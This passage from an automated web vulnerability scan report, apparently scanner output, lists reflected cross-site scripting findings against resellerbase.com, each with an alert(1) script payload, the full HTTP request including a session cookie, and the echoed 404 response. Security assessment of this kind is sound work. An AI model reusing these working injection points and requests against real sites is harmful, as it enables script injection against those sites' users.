Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service60f10<script>alert(1)</script>30d91c9d703/software-scripts/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5290. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66d05<script>alert(1)</script>a2f0f07ef23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts66d05<script>alert(1)</script>a2f0f07ef23/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts66d05<script>alert(1)</script>a2f0f07ef23/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5291. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60067<script>alert(1)</script>b8b023a7221 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes60067<script>alert(1)</script>b8b023a7221/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes60067<script>alert(1)</script>b8b023a7221/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5292. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c38ff<script>alert(1)</script>dc4040d1b97 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosc38ff<script>alert(1)</script>dc4040d1b97/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosc38ff<script>alert(1)</script>dc4040d1b97/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5293. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3b987<script>alert(1)</script>2e9e5b86175 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images3b987<script>alert(1)</script>2e9e5b86175/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images3b987<script>alert(1)</script>2e9e5b86175/rating/ was not found on this server.</p>
...[SNIP]...

2.5294. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8f8f4<script>alert(1)</script>be92489c92b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating8f8f4<script>alert(1)</script>be92489c92b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating8f8f4<script>alert(1)</script>be92489c92b/ was not found on this server.</p>
...[SNIP]...

2.5295. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload da9ca<script>alert(1)</script>a373de9001d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/?da9ca<script>alert(1)</script>a373de9001d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/?da9ca<script>alert(1)</script>a373de9001d=1 was not found on this server.</p>
...[SNIP]...

2.5296. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a09e0<script>alert(1)</script>3dcba84e99e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea09e0<script>alert(1)</script>3dcba84e99e/software-scripts/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea09e0<script>alert(1)</script>3dcba84e99e/software-scripts/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5297. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ad00<script>alert(1)</script>8d3dcad74e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts2ad00<script>alert(1)</script>8d3dcad74e1/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts2ad00<script>alert(1)</script>8d3dcad74e1/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5298. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 322d7<script>alert(1)</script>880a98724dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes322d7<script>alert(1)</script>880a98724dd/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes322d7<script>alert(1)</script>880a98724dd/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5299. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6e00a<script>alert(1)</script>ff315c06af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos6e00a<script>alert(1)</script>ff315c06af/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos6e00a<script>alert(1)</script>ff315c06af/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5300. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77605<script>alert(1)</script>86c50ebd872 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images77605<script>alert(1)</script>86c50ebd872/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images77605<script>alert(1)</script>86c50ebd872/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5301. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 687c0<script>alert(1)</script>71fe2acc7ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating687c0<script>alert(1)</script>71fe2acc7ae/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating687c0<script>alert(1)</script>71fe2acc7ae/3half.gif was not found on this server.</p>
...[SNIP]...

2.5302. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3f0d1<script>alert(1)</script>e601c12a770 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/3half.gif3f0d1<script>alert(1)</script>e601c12a770 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/3half.gif3f0d1<script>alert(1)</script>e601c12a770 was not found on this server.</p>
...[SNIP]...

2.5303. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12978<script>alert(1)</script>c18f9c15c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/3half.gif?12978<script>alert(1)</script>c18f9c15c6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/rating/3half.gif?12978<script>alert(1)</script>c18f9c15c6=1 was not found on this server.</p>
...[SNIP]...

2.5304. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ded8<script>alert(1)</script>2f48af2f4b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3ded8<script>alert(1)</script>2f48af2f4b1/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3ded8<script>alert(1)</script>2f48af2f4b1/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5305. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2763d<script>alert(1)</script>46982f3112d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts2763d<script>alert(1)</script>46982f3112d/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts2763d<script>alert(1)</script>46982f3112d/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5306. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 57ff8<script>alert(1)</script>a5f2e11cbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes57ff8<script>alert(1)</script>a5f2e11cbba/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes57ff8<script>alert(1)</script>a5f2e11cbba/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5307. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c1757<script>alert(1)</script>f284620fa7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosc1757<script>alert(1)</script>f284620fa7c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosc1757<script>alert(1)</script>f284620fa7c/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5308. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php [REST URL parameter 5]

